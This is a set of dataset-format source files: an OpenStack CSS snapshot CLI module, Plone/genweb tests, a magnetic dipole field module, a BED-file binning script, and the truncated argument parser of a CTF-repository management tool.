_get_columns(data)\n data = utils.get_item_properties(data, columns)\n\n return (display_columns, data)\n\n\nclass RestartCluster(command.ShowOne):\n _description = _('Show details of a CSS cluster')\n\n def get_parser(self, prog_name):\n parser = super(RestartCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n # default='system',\n help=_('Cluster name (currently only `system`)')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n data = client.restart_cluster(\n cluster=parsed_args.cluster,\n )\n\n display_columns, columns = _get_columns(data)\n data = utils.get_item_properties(data, columns)\n\n return (display_columns, data)\n\n\nclass Snapshots(command.Lister):\n _description = _('List of CSS Backups')\n columns = (\n 'id',\n 'clusterid',\n 'clustername',\n 'name',\n 'clustername',\n 'status',\n 'created'\n # 'dimensions',\n # 'metric_name',\n # 'unit',\n )\n\n\n\n def get_parser(self, prog_name):\n parser = super(Snapshots, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster_id',\n metavar='',\n help=_('Cluster id')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n query = {}\n if parsed_args.cluster_id:\n query['cluster_id'] = parsed_args.cluster_id\n\n \"\"\"\n if parsed_args.namespace:\n query['namespace'] = parsed_args.namespace\n if parsed_args.metric_name:\n query['metric_name'] = parsed_args.metric_name\n if parsed_args.unit:\n query['unit'] = parsed_args.unit\n \"\"\"\n\n data = client.snapshots(**query)\n # data = client.clusters()\n\n data = list(data)\n # data = data[\"backups\"]\n # for s in range(data):\n # if data[s] is None:\n # data.remove(s)\n\n table = (self.columns,\n (utils.get_dict_properties(\n _flatten_output(s), self.columns\n ) for s in data))\n return table\n", "sub_path": "otcextensions/osclient/css/v1/snapshot.py", "file_name": "snapshot.py", "file_ext": "py", "file_size_in_byte": 8262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "otcextensions.common.sdk_utils.get_osc_show_columns_for_sdk_resource", "line_number": 53, "usage_type": "call"}, {"api_name": "otcextensions.common.sdk_utils", "line_number": 53, "usage_type": "name"}, {"api_name": "osc_lib.command.command.Command", "line_number": 56, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 56, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 57, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 65, "usage_type": "call"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 77, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 77, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 78, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 106, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 117, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 126, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 135, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 171, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 171, "usage_type": "name"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 176, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 176, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 177, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 185, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 197, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 197, "usage_type": "name"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 202, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 202, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 203, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 211, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 223, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 223, "usage_type": "name"}, {"api_name": "osc_lib.command.command.Lister", "line_number": 228, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 228, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 229, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 250, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_dict_properties", "line_number": 280, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 280, "usage_type": "name"}]}
+{"seq_id": "335517362", "text": "import unittest2 as unittest\nfrom genweb.core.testing import GENWEB_INTEGRATION_TESTING\nfrom genweb.core.testing import GENWEB_FUNCTIONAL_TESTING\nfrom AccessControl import Unauthorized\nfrom zope.component import getMultiAdapter, queryUtility\nfrom zope.interface import alsoProvides\nfrom Products.CMFCore.utils import getToolByName\n\nfrom plone.testing.z2 import Browser\nfrom plone.app.testing import TEST_USER_ID, TEST_USER_NAME\nfrom plone.app.testing import login, logout\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import applyProfile\n\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\n\nfrom genweb.core.interfaces import IHomePage\nfrom genweb.theme.portlets import homepage\n\nimport transaction\n\n\nclass IntegrationTest(unittest.TestCase):\n\n layer = GENWEB_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n\n def testPortalConstrains(self):\n portal_allowed_types = ['Folder', 'File', 'Image', 'Document']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.assertEqual(sorted([ct.id for ct in self.portal.allowedContentTypes()]), sorted(portal_allowed_types))\n\n def testLinkBehavior(self):\n \"\"\"Test for Link behavior and related index and metadata\"\"\"\n portal = self.layer['portal']\n setRoles(portal, TEST_USER_ID, ['Manager'])\n login(portal, TEST_USER_NAME)\n portal.invokeFactory('Folder', 'f2', title=u\"Soc una carpeta\")\n f2 = portal['f2']\n f2.invokeFactory('Link', 'enllac', title=u\"Soc un link\")\n link = f2['enllac']\n link.open_link_in_new_window = False\n link.reindexObject()\n\n self.assertEqual(link.open_link_in_new_window, False)\n\n results = portal.portal_catalog.searchResults(portal_type='Link')\n self.assertEqual(results[0].open_link_in_new_window, False)\n\n link.open_link_in_new_window = True\n link.reindexObject()\n\n results = portal.portal_catalog.searchResults(portal_type='Link')\n self.assertEqual(results[0].open_link_in_new_window, True)\n\n def testHomePageMarkerInterface(self):\n self.assertTrue(IHomePage.providedBy(self.portal['front-page']))\n\n def testAdapters(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Document', 'test_adapter', title=u\"Soc una pagina\")\n from genweb.core.adapters import IImportant\n obj = IImportant(self.portal.test_adapter)\n self.assertEqual(obj.is_important, False)\n obj.is_important = True\n obj2 = IImportant(self.portal.test_adapter)\n self.assertEqual(obj2.is_important, True)\n\n def test_favorites(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Folder', 'prova', title=u\"Soc una carpeta\")\n prova = self.portal['prova']\n prova.invokeFactory('Folder', 'prova', title=u\"Soc una carpeta\")\n prova2 = prova['prova']\n\n from genweb.core.adapters.favorites import IFavorite\n IFavorite(prova2).add(TEST_USER_NAME)\n self.assertTrue(TEST_USER_NAME in IFavorite(prova2).get())\n self.assertTrue(TEST_USER_NAME not in IFavorite(prova).get())\n\n def test_protected_content(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Folder', 'test_folder', title=u\"Soc una carpeta\")\n self.portal.test_folder.invokeFactory('Document', 'test_document', title=u\"Soc un document\")\n from genweb.core.interfaces import IProtectedContent\n alsoProvides(self.portal.test_folder, IProtectedContent)\n setRoles(self.portal, TEST_USER_ID, ['Reader', 'Editor'])\n\n self.portal.test_folder.manage_delObjects('test_document')\n\n self.assertRaises(Unauthorized, self.portal.manage_delObjects, 'test_folder')\n\n\nclass FunctionalTest(unittest.TestCase):\n\n layer = GENWEB_FUNCTIONAL_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n self.app = self.layer['app']\n self.browser = Browser(self.app)\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n\n # Create a portlet in a slot\n benvingut = self.portal['front-page']\n manager = queryUtility(IPortletManager, name='genweb.portlets.HomePortletManager2', context=benvingut)\n assignments = getMultiAdapter((benvingut, manager), IPortletAssignmentMapping)\n homepage_assignment = homepage.Assignment()\n assignments['homepage'] = homepage_assignment\n transaction.commit()\n setRoles(self.portal, TEST_USER_ID, ['Member'])\n\n def testHomePagePortlet(self):\n portalURL = self.portal.absolute_url()\n\n self.browser.open(portalURL)\n\n self.assertTrue('Congratulations! You have successfully installed Plone.' in self.browser.contents)\n", "sub_path": "genweb/core/tests/test_basic.py", "file_name": "test_basic.py", "file_ext": "py", "file_size_in_byte": 5134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "unittest2.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "genweb.core.testing.GENWEB_INTEGRATION_TESTING", "line_number": 26, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 34, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 34, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 35, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 35, "usage_type": "argument"}, {"api_name": "plone.app.testing.setRoles", "line_number": 41, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 41, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 42, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 42, "usage_type": "argument"}, {"api_name": "genweb.core.interfaces.IHomePage.providedBy", "line_number": 62, "usage_type": "call"}, {"api_name": "genweb.core.interfaces.IHomePage", "line_number": 62, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 65, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 65, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 66, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 66, "usage_type": "argument"}, {"api_name": "genweb.core.adapters.IImportant", "line_number": 69, "usage_type": "call"}, {"api_name": "genweb.core.adapters.IImportant", "line_number": 72, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 76, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 76, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 77, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 77, "usage_type": "argument"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 84, "usage_type": "argument"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 84, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 85, "usage_type": "name"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 85, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 86, "usage_type": "name"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 86, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 89, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 89, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 90, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 90, "usage_type": "argument"}, {"api_name": "zope.interface.alsoProvides", "line_number": 94, "usage_type": "call"}, {"api_name": "genweb.core.interfaces.IProtectedContent", "line_number": 94, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 95, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 95, "usage_type": "argument"}, {"api_name": "AccessControl.Unauthorized", "line_number": 99, "usage_type": "argument"}, {"api_name": "unittest2.TestCase", "line_number": 102, "usage_type": "attribute"}, {"api_name": "genweb.core.testing.GENWEB_FUNCTIONAL_TESTING", "line_number": 104, "usage_type": "name"}, {"api_name": "plone.testing.z2.Browser", "line_number": 110, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 111, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 111, "usage_type": "argument"}, {"api_name": "zope.component.queryUtility", "line_number": 115, "usage_type": "call"}, {"api_name": "plone.portlets.interfaces.IPortletManager", "line_number": 115, "usage_type": "argument"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 116, "usage_type": "call"}, {"api_name": "plone.portlets.interfaces.IPortletAssignmentMapping", "line_number": 116, "usage_type": "argument"}, {"api_name": "genweb.theme.portlets.homepage.Assignment", "line_number": 117, "usage_type": "call"}, {"api_name": "genweb.theme.portlets.homepage", "line_number": 117, "usage_type": "name"}, {"api_name": "transaction.commit", "line_number": 119, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 120, "usage_type": "argument"}]}
+{"seq_id": "429742723", "text": "import numpy as np\nfrom scipy import linalg\n\n\ndef dipole_field(xv, b0=-31100):\n \"\"\"\n \"\"\"\n bx = lambda x,y,z: 3*b0*x*z/np.sqrt(x*x+y*y+z*z)**5\n by = lambda x,y,z: 3*b0*y*z/np.sqrt(x*x+y*y+z*z)**5\n bz = lambda x,y,z: b0*(2*z*z-x*x-y*y)/np.sqrt(x*x+y*y+z*z)**5\n \n bvec = np.r_[bx(*xv), by(*xv), bz(*xv)]\n \n return bvec\n\n\ndef dipole_gradient(xv, b0=-31100, r_e=6371, dx=0.01):\n \"\"\"Estimate gradient of dipole field\n \n Uses finite differences becauseit saves dev time over\n calculating derivatives analytically.\n \"\"\"\n \n bx = lambda x, y, z: 3*b0*x*z/np.sqrt(x*x+y*y+z*z)**5\n by = lambda x, y, z: 3*b0*y*z/np.sqrt(x*x+y*y+z*z)**5\n bz = lambda x, y, z: b0*(2*z*z-x*x-y*y)/np.sqrt(x*x+y*y+z*z)**5\n df = lambda f, x, d: (f(x+d)-f(x-d))/(2*d)\n \n dbxdx = df(lambda x: bx(x, xv[1], xv[2]), xv[0], dx)\n dbxdy = df(lambda x: bx(xv[0], x, xv[2]), xv[1], dx)\n dbxdz = df(lambda x: bx(xv[0], xv[1], x), xv[2], dx)\n gradbx = np.r_[dbxdx, dbxdy, dbxdz]/r_e\n \n dbydx = df(lambda x: by(x, xv[1], xv[2]), xv[0], dx)\n dbydy = df(lambda x: by(xv[0], x, xv[2]), xv[1], dx)\n dbydz = df(lambda x: by(xv[0], xv[1], x), xv[2], dx)\n gradby = np.r_[dbydx, dbydy, dbydz]/r_e\n \n dbzdx = df(lambda x: bz(x, xv[1], xv[2]), xv[0], dx)\n dbzdy = df(lambda x: bz(xv[0], x, xv[2]), xv[1], dx)\n dbzdz = df(lambda x: bz(xv[0], xv[1], x), xv[2], dx)\n gradbz = np.r_[dbzdx, dbzdy, dbzdz]/r_e\n \n gradb = np.c_[gradbx, gradby, gradbz]\n \n return gradb\n\n\ndef grad_bmag(xv, r_e=6371, dx=0.01):\n \"\"\"Calculate the gradient of the magnetic field magnitude\"\"\"\n btot = lambda x, y, z: linalg.norm(dipole_field([x, y, z]))\n df = lambda f, x: (f(x + dx) - f(x - dx))/(2*dx)\n bgradx = df(lambda x: btot(x, xv[1], xv[2]), xv[0])\n bgrady = df(lambda x: btot(xv[0], x, xv[2]), xv[1])\n bgradz = df(lambda x: btot(xv[0], xv[1], x), xv[2])\n return np.r_[bgradx, bgrady, bgradz]/r_e\n", "sub_path": "ptm_python/ptm_dipole.py", "file_name": "ptm_dipole.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.sqrt", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.r_", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.r_", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "scipy.linalg.norm", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.r_", "line_number": 56, "usage_type": "attribute"}]}
+{"seq_id": "124214128", "text": "#!/usr/bin/env python3\n\n# Author: Jeffrey Grover\n# Purpose: Create a new bed file where entries made of bins from the original\n# This is most useful for creating metaplots or looking at expression over a\n# fraction of the original features\n# Created: 2018-01-15\n# Refactored: 2019-06-22\n\nimport csv\nfrom argparse import ArgumentParser\n\n\n# Subroutine functions\n\ndef parse_bed_to_dict(input_bed):\n bed_dict = {}\n with open(input_bed, 'r') as input_handle:\n for line in input_handle:\n entry = line.strip().split('\\t')\n feature_id = entry[3]\n try:\n score = entry[4]\n except IndexError:\n score = '.'\n try:\n strand = entry[5]\n except IndexError:\n strand = '.'\n bed_dict[feature_id] = {\n 'chromosome': entry[0],\n 'start': int(entry[1]),\n 'stop': int(entry[2]),\n 'score': score,\n 'strand': strand\n }\n return bed_dict\n\n\ndef create_upstream_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number = i + 1 # Humans count starting at 1\n bin_start = window_size - (bin_width * i)\n bin_stop = bin_start - (bin_width - 1)\n upstream_file = '%su_%s_%s-%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_start, bin_stop)\n with open(upstream_file, 'w') as upstream_handle:\n upstream_writer = csv.writer(upstream_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Bins for + and unstranded start at the feature - window size\n\n if strand in ('+', '.'):\n start = start - (window_size - (bin_width * i))\n stop = start + (bin_width - 1)\n\n # Bins for - strand start at 1 beyond the stop\n\n elif strand == '-':\n stop = stop + (window_size - (bin_width * i))\n start = stop - (bin_width - 1)\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n upstream_writer.writerow(output_row)\n\n\ndef create_downstream_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number = i + 1\n bin_start = (bin_width * i) + 1\n bin_stop = (bin_start - 1) + bin_width\n downstream_file = '%sd_%s_%s-%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_start, bin_stop)\n with open(downstream_file, 'w') as downstream_handle:\n downstream_writer = csv.writer(downstream_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Bins for + and unstranded start at 1 beyond the feature stop\n\n if strand in ('+', '.'):\n start = stop + ((bin_width * i) + 1)\n stop = start + (bin_width - 1)\n\n # Bins for - strand start 1 before the start\n\n elif strand == '-':\n stop = start - ((bin_width * i) + 1)\n start = stop - (bin_width - 1)\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n downstream_writer.writerow(output_row)\n\n\ndef create_body_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number = i + 1\n bin_perc_length = bin_number * (100 / num_bins)\n body_file = '%sb_%s_%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_perc_length)\n with open(body_file, 'w') as body_handle:\n body_writer = csv.writer(body_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n feature_length = stop - start\n body_bin_width = (feature_length / num_bins)\n\n # For + strand or unstranded bin coordinates start at start + 1\n # First and last will be 1nt shorter to so exact start can be its own bin\n\n if strand in ('+', '.'):\n if i == 0:\n start = start + 1\n else:\n start = int(round((start + (body_bin_width * i)), 0))\n stop = int(round((start + body_bin_width), 0) - 1)\n\n # For - strand bins are numbered from the bed file's \"stop\"\n # First will be 1nt shorter to so exact stop can be its own bin\n\n elif strand == '-':\n if i == 0:\n stop = int(round((stop - (body_bin_width * i)), 0) - 2)\n else:\n stop = int(round((stop - (body_bin_width * i)), 0) - 1)\n start = int(round((stop - body_bin_width), 0))\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n body_writer.writerow(output_row)\n\n\ndef get_start_coords(bed_dict, output_prefix):\n start_file = '%sstart.bed' % output_prefix\n with open(start_file, 'w') as start_handle:\n start_writer = csv.writer(start_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Start coordinates are zero-based already for + or unstranded\n\n if strand in ('+', '.'):\n stop = start + 1\n\n # For - strand some extra work is required\n\n elif strand == '-':\n start = stop - 1\n\n # Output bins\n\n output_row = [chromosome, start, stop, feature_id, score, strand]\n start_writer.writerow(output_row)\n\n\ndef get_stop_coords(bed_dict, output_prefix):\n stop_file = '%sstop.bed' % output_prefix\n with open(stop_file, 'w') as stop_handle:\n stop_writer = csv.writer(stop_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Stop coordinate begins at stop -1 for + or unstranded\n\n if strand in ('+', '.'):\n start = stop - 1\n\n # Already zero baed for - strand\n\n elif strand == '-':\n stop = start + 1\n\n # Output bins\n\n output_row = [chromosome, start, stop, feature_id, score, strand]\n stop_writer.writerow(output_row)\n\n\n# Parse command line options\n\ndef get_args():\n parser = ArgumentParser(\n description='Create separate bed files for desired bin sizes up and '\n 'downstream of an input bed file. Divides feature bodies into an equal '\n 'number of bins as well. Be sure to use bin widths that can be divided '\n 'evenly into your window size or it will likely fail. Start and stop of'\n ' each feature is also output as a bin of length 1.')\n parser.add_argument('input_bed',\n help='bed file to process',\n metavar='FILE.bed')\n parser.add_argument('-w', '--window',\n help='Size of up and downstream windows (nt)',\n type=int,\n metavar='INT')\n parser.add_argument('-b', '--bin_width',\n help='Bin size (nt)',\n type=int,\n metavar='INT')\n parser.add_argument('-p', '--prefix',\n help='Prefix for output files. Files will be output as: Prefix[body|up|down]_bin#_length[start-stop|percent].bed',\n metavar='PREFIX')\n return parser.parse_args()\n\n\n# Run the functions, create the bins\n\ndef main(args):\n bed_dict = parse_bed_to_dict(args.input_bed)\n create_body_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n create_upstream_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n create_downstream_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n get_start_coords(bed_dict, args.output_prefix)\n get_stop_coords(bed_dict, args.output_prefix)\n\n\nif __name__ == '__main__':\n args = get_args()\n main(args)\n", "sub_path": "bed_make_bins.py", "file_name": "bed_make_bins.py", "file_ext": "py", "file_size_in_byte": 9789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "csv.writer", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 83, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 117, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 157, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 184, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 211, "usage_type": "call"}]}
+{"seq_id": "73999657", "text": "# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# file: api.py\n# date: 2018-03-20\n# author: paul.dautry\n# purpose:\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# =============================================================================\n# IMPORTS\n# =============================================================================\nfrom pathlib import Path\nfrom slugify import slugify\nfrom argparse import ArgumentParser, Namespace\nfrom traceback import print_exc\nfrom mkctf.helper.logger import Logger\nfrom mkctf.helper.config import load_config\nfrom mkctf.command.init import init\nfrom mkctf.command.show import show\nfrom mkctf.command.build import build\nfrom mkctf.command.deploy import deploy\nfrom mkctf.command.status import status\nfrom mkctf.command.create import create\nfrom mkctf.command.delete import delete\nfrom mkctf.command.enable import enable\nfrom mkctf.command.export import export\nfrom mkctf.command.disable import disable\nfrom mkctf.command.configure import configure\nfrom mkctf.command.renew_flag import renew_flag\nfrom mkctf.object.repository import Repository\n# =============================================================================\n# CONFIGURATION\n# =============================================================================\nDEFAULT_SIZE = 32\nDEFAULT_TIMEOUT = 4 # seconds\n# =============================================================================\n# CLASSES\n# =============================================================================\nclass MKCTFAPI:\n \"\"\"Provides access to all functionalities programmatically\n\n \"\"\"\n @staticmethod\n def parse_args():\n \"\"\"Parse command line arguments\n\n Returns:\n Namespace -- [description]\n \"\"\"\n p = ArgumentParser(add_help=True,\n description=\"Manage CTF challenges repository.\")\n p.add_argument('-q', '--quiet', action='store_true',\n help=\"decrease program verbosity\")\n p.add_argument('-d', '--debug', action='store_true',\n help=\"output debug messages\")\n p.add_argument('--no-color', action='store_true',\n help=\"disable colored output\")\n p.add_argument('-r', '--repo-root', type=Path, default=Path.cwd(),\n help=\"repository's root folder absolute path.\")\n p.add_argument('-j', '--json', action='store_true',\n help=\"json formatted output.\")\n p.add_argument('-f', '--force', action='store_true',\n help=\"do not ask for confirmation.\")\n # -- add subparsers\n sps = p.add_subparsers(dest='command', metavar='COMMAND')\n sps.required = True\n # ---- init\n init_p = sps.add_parser('init', help=\"initializes mkctf repository.\")\n init_p.set_defaults(func=init)\n # ---- show\n show_p = sps.add_parser('show', help=\"shows challenges.\")\n show_p.add_argument('-c', '--category', help=\"challenge's category.\")\n show_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n show_p.set_defaults(func=show)\n # ---- create\n create_p = sps.add_parser('create', help=\"creates a challenge.\")\n create_p.set_defaults(func=create)\n # ---- delete\n delete_p = sps.add_parser('delete', help=\"deletes a challenge.\")\n delete_p.add_argument('category', help=\"challenge's category.\")\n delete_p.add_argument('slug', help=\"challenge's slug.\")\n delete_p.set_defaults(func=delete)\n # ---- configure\n configure_p = sps.add_parser('configure', help=\"edits repository's config \"\n \"or challenge's config.\")\n configure_p.add_argument('-c', '--category', help=\"challenge's category.\")\n configure_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n configure_p.set_defaults(func=configure)\n # ---- enable\n enable_p = sps.add_parser('enable', help=\"enables a challenge.\")\n enable_p.add_argument('category', help=\"challenge's category.\")\n enable_p.add_argument('slug', help=\"challenge's slug.\")\n enable_p.set_defaults(func=enable)\n # ---- disable\n disable_p = sps.add_parser('disable', help=\"disables a challenge.\")\n disable_p.add_argument('category', help=\"challenge's category.\")\n disable_p.add_argument('slug', help=\"challenge's slug.\")\n disable_p.set_defaults(func=disable)\n # ---- export\n export_p = sps.add_parser('export', help=\"exports enabled static \"\n \"challenges.\")\n export_p.add_argument('export_dir', type=Path,\n help=\"folder where archives must be written. If \"\n \"the folder does not exist it will be \"\n \"created.\")\n export_p.add_argument('-c', '--category', help=\"challenge's category.\")\n export_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n export_p.add_argument('--include-disabled', action='store_true',\n help=\"export disabled challenges too.\")\n export_p.set_defaults(func=export)\n # ---- renew-flag\n renew_flag_p = sps.add_parser('renew-flag',\n help=\"renews flags. You might want to \"\n \"build and deploy/export after that.\")\n renew_flag_p.add_argument('-c', '--category', help=\"challenge's category.\")\n renew_flag_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n renew_flag_p.add_argument('--size', type=int, default=DEFAULT_SIZE,\n help=\"flag's random string size (in bytes).\")\n renew_flag_p.set_defaults(func=renew_flag)\n # ---- build\n build_p = sps.add_parser('build',\n help=\"builds challenges. After building \"\n \"challenges you might want to deploy/export.\")\n build_p.add_argument('-c', '--category', help=\"challenge's category.\")\n build_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n build_p.add_argument('-t', '--timeout', type=int, 